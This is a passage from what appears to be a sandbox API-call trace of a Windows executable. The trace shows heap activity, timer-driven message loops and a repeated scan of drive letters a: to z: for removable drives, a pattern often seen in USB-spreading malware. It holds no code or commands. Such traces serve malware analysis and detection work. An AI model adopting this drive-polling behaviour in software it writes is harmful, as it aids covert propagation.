(in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0215.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0215.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.460] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.461] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.461] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.461] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.461] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.461] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.461] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.461] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0215.461] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0215.461] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0215.461] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0215.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0215.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.461] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e640 [0215.461] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.462] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e640 | out: hHeap=0x12c0000) returned 1 [0215.462] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.462] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.462] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.462] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0215.462] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.462] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0215.462] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.462] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0215.462] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.462] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.462] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.462] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.462] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.462] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.462] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0215.462] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0215.462] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.462] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0215.462] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.462] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0215.462] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0215.462] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.463] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.463] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.463] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.463] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0215.463] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.463] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0215.463] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.463] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.463] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0215.463] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.463] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.463] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.463] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.463] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.463] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.463] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.464] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.464] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.464] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.464] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.464] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.464] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.465] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.465] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.465] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.465] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.465] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.466] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.466] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.466] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.466] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.466] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.467] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.467] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.467] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.467] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.467] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.468] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.468] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.468] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.468] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.468] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.468] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.468] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.468] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.468] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.468] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.468] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.468] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.468] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.468] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.468] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.468] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.468] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.469] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.469] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.469] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0215.469] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.469] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.469] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f60 [0215.469] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f60 | out: hHeap=0x12c0000) returned 1 [0215.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0215.469] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e640 [0215.469] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e640 | out: hHeap=0x12c0000) returned 1 [0215.470] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0215.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0215.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.470] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0215.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0215.470] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0215.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0215.470] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0215.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0215.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0215.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0215.470] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.471] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.471] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0215.471] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0215.471] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.471] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.471] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.471] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.471] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.471] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.471] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.471] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.472] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.472] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.472] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.472] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.472] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.472] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.472] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.472] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.473] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.473] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.473] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.473] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.473] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.473] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.474] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.474] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.474] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.474] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.474] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.474] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.475] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.475] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0215.475] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.475] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.475] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.475] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.475] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.475] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.475] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0215.475] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.475] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.475] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.475] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.475] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.475] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.475] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0215.475] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326160 [0215.475] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.475] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.475] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.475] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326160 | out: hHeap=0x12c0000) returned 1 [0215.475] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.475] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.475] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0215.475] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.475] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0215.475] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.475] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0215.475] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.475] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0215.475] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.476] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.476] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.476] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0215.476] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.476] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.476] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.476] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0215.476] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.476] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.476] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0215.476] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0215.476] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.476] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0215.476] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0215.476] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0215.476] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0215.476] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.476] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.476] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.476] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.476] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0215.476] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.476] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.476] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.476] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.476] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0215.476] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0215.476] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.476] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.476] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.477] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.477] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.477] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.477] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.477] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.477] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.478] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.478] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.478] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.478] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.478] GetDriveTypeW 